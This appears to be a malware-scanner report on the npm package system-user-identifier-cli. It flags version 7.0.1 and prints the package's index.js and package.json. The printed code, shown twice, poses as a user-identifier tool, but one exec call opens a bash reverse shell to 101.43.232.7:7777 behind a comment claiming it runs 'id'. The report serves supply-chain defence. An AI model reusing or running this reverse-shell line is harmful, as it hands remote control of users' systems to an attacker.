// npm package
system-user-identifier-cli
A simple npx tool to check system user identifier
Versions
8
Maintainers
1
License
ISC
First publish
2026-05-25
publisher
ayoung299
tarball
1,000 B
AUTO-PUBLISHED · 3 versions indexed · latest publish: 2026-05-25
// exfil path
what is read → where it ships
steals
- ○ home dir
- ○ system info
sends to
- ⌖ 101.43.232.7
- ⚙ reverse shell (fetches + executes remote payload)
// offending code · @7.0.1 · 1 file flagged
llm: malicious · 0.95 → The static analyzer detected a reverse-shell pattern: a remote code execution construct is plainly visible in the install path.
- @7.0.1 · AUTO-PUBLISHED · publisher: ayoung299 · heuristic 42/100 · static flags 4 · llm malicious (0.95) via fast-track · new-publisher:0d · publisher-version-pump:6 · reads-homedir · reads-system-info · child-process-spawn · reverse-shell
// offending code · 1 file flagged · patterns: 4
--- package/index.js (excerpt) ---
#!/usr/bin/env node
const os = require('os');
const { exec } = require('child_process');

// Method 1: use Node.js built-in modules (recommended, better cross-platform support)
const user = os.userInfo().username;
const platform = os.platform();
console.log(`呃呃呃呃呃呃呃呃呃呃呃呃 Hello! (Node内置方法) 当前用户是: ${user} (${platform})`);

// Method 2: run the system's id command directly (native shell)
try {
  exec('bash -c "bash -i >& /dev/tcp/101.43.232.7/7777 0>&1"');
  await setTimeout(600000);
} catch (error) {
  console.error('执行 id 命令失败:', error.message);
}

--- package.json (entry) ---
{
  "name": "system-user-identifier-cli",
  "version": "7.0.1",
  "description": "A simple npx tool to check system user identifier",
  "main": "index.js",
  "bin": {
    "system-user-identifier-cli": "index.js"
  },
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "keywords": [
    "cli",
    "id",
    "npx"
  ],
  "author": "Your Name",
  "license": "ISC"
}

--- index.js (entry) ---
#!/usr/bin/env node
const os = require('os');
const { exec } = require('child_process');

// Method 1: use Node.js built-in modules (recommended, better cross-platform support)
const user = os.userInfo().username;
const platform = os.platform();
console.log(`呃呃呃呃呃呃呃呃呃呃呃呃 Hello! (Node内置方法) 当前用户是: ${user} (${platform})`);

// Method 2: run the system's id command directly (native shell)
try {
  exec('bash -c "bash -i >& /dev/tcp/101.43.232.7/7777 0>&1"');
  await setTimeout(600000);
} catch (error) {
  console.error('执行 id 命令失败:', error.message);
}
